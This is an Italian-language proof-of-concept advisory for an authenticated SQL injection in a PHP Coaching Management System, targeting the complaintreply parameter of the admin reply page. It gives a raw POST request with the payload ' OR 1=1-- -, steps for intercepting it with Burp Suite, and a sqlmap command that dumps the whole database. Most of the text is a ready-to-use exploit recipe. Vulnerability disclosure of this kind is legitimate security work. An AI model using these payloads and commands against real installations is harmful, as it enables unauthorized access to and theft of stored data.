
Prova di concetto per l'iniezione SQL autenticata nel Coaching Management System, che dimostra il dump del database tramite il parametro non sanificato complaintreply.
Esiste una vulnerabilità di SQL Injection nel Coaching Management System in PHP. Il parametro complaintreply nella funzionalità di risposta dell'amministratore non viene adeguatamente sanificato prima di essere utilizzato nelle query SQL. Un attaccante autenticato (Admin) può iniettare query SQL dannose, portando all'estrazione completa del database.
/cims/modules/admin/reply.phpcomplaintreplycode-projects.org
Coaching Management System in PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/
Sconosciuta (Testata sull'ultima versione disponibile ad aprile 2026)
Lo studente invia un reclamo 
L'amministratore apre il reclamo e accede alla funzionalità di risposta
POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded
complaintreply=' OR 1=1-- -&submit=submit

Intercetta la richiesta tramite Burp Suite 
Inietta il payload:
'

Errore SQL osservato
7. Conferma l'iniezione:
' OR 1=1-- -

Esegui il dump del database utilizzando:
sqlmap -r sqli.txt --dump

Gravità: CRITICA